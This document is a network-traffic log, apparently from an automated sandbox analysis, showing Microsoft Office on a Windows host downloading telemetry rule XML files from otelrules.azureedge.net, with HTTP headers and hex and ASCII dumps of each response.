                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                      Session IDSource IPSource PortDestination IPDestination Port
                      131192.168.2.64985113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:23 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:23 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:23 GMT
                      Content-Type: text/xml
                      Content-Length: 1366
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                      ETag: "0x8DC582BEA414B16"
                      x-ms-request-id: b85c3fdb-401e-008c-650e-4586c2000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165223Z-174f7845968cs2nkhC1EWR2tq000000001wg00000000d846
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:23 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                      Session IDSource IPSource PortDestination IPDestination Port
                      132192.168.2.64985213.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:23 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:23 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:23 GMT
                      Content-Type: text/xml
                      Content-Length: 1399
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                      ETag: "0x8DC582BE1CC18CD"
                      x-ms-request-id: a132b298-601e-0070-6cf9-43a0c9000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165223Z-174f7845968psccphC1EWRuz9s00000016c000000000rh8b
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:23 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                      Session IDSource IPSource PortDestination IPDestination Port
                      133192.168.2.64984713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:24 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:24 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:24 GMT
                      Content-Type: text/xml
                      Content-Length: 1399
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                      ETag: "0x8DC582BE8C605FF"
                      x-ms-request-id: 8a8d0990-701e-0021-2191-3f3d45000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165224Z-174f7845968xr5c2hC1EWRd0hn0000000r1g00000000ewdw
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:24 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                      Session IDSource IPSource PortDestination IPDestination Port
                      134192.168.2.64985313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:24 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:25 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:24 GMT
                      Content-Type: text/xml
                      Content-Length: 1362
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                      ETag: "0x8DC582BEB256F43"
                      x-ms-request-id: 922d60ff-b01e-0021-755f-40cab7000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165224Z-174f7845968frfdmhC1EWRxxbw000000165g00000000qe4r
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:25 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination Port
                      135192.168.2.64985413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:24 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:25 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:24 GMT
                      Content-Type: text/xml
                      Content-Length: 1403
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                      ETag: "0x8DC582BEB866CDB"
                      x-ms-request-id: 6361a643-501e-0047-3bd4-43ce6c000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165224Z-174f784596886s2bhC1EWR743w000000167000000000hgrv
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:25 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                      Session IDSource IPSource PortDestination IPDestination Port
                      136192.168.2.64985513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:25 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:25 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:25 GMT
                      Content-Type: text/xml
                      Content-Length: 1366
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                      ETag: "0x8DC582BE5B7B174"
                      x-ms-request-id: 621fcd15-801e-008c-0d40-447130000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165225Z-174f7845968nxc96hC1EWRspw800000015yg00000000cwnk
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:25 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                      Session IDSource IPSource PortDestination IPDestination Port
                      137192.168.2.64985613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:25 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:30 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:30 GMT
                      Content-Type: text/xml
                      Content-Length: 1399
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                      ETag: "0x8DC582BE976026E"
                      x-ms-request-id: ae63cf80-d01e-00ad-1daa-42e942000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165230Z-174f7845968xr5c2hC1EWRd0hn0000000r3g00000000764a
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:30 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                      Session IDSource IPSource PortDestination IPDestination Port
                      138192.168.2.64985813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:26 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:27 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:27 GMT
                      Content-Type: text/xml
                      Content-Length: 1362
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                      ETag: "0x8DC582BDC13EFEF"
                      x-ms-request-id: f4a7b183-b01e-0098-27d5-43cead000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165227Z-174f784596886s2bhC1EWR743w00000016a0000000005h83
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:27 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                      Session IDSource IPSource PortDestination IPDestination Port
                      139192.168.2.64985913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:26 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:27 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:27 GMT
                      Content-Type: text/xml
                      Content-Length: 1425
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                      ETag: "0x8DC582BE6BD89A1"
                      x-ms-request-id: 68e9c15b-c01e-002b-1eed-446e00000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165227Z-174f7845968frfdmhC1EWRxxbw000000165000000000smg1
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:27 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                      Session IDSource IPSource PortDestination IPDestination Port
                      140192.168.2.64986013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:27 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:27 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:27 GMT
                      Content-Type: text/xml
                      Content-Length: 1388
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                      ETag: "0x8DC582BDBD9126E"
                      x-ms-request-id: fc0d267c-101e-0079-0929-415913000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165227Z-174f7845968nxc96hC1EWRspw800000015vg00000000sk7f
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:27 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                      Session IDSource IPSource PortDestination IPDestination Port
                      141192.168.2.64986113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:27 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:28 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:27 GMT
                      Content-Type: text/xml
                      Content-Length: 1415
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                      ETag: "0x8DC582BE7C66E85"
                      x-ms-request-id: cf7e946f-901e-0083-4991-3fbb55000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165227Z-174f7845968kvnqxhC1EWRmf3g0000000sy000000000rk01
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:28 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                      Session IDSource IPSource PortDestination IPDestination Port
                      142192.168.2.64986220.198.119.84443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:29 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 77 35 73 2b 33 39 54 39 58 55 61 4f 36 51 30 43 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 36 38 66 66 39 32 66 39 66 36 39 63 64 37 61 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: w5s+39T9XUaO6Q0C.1Context: 168ff92f9f69cd7a
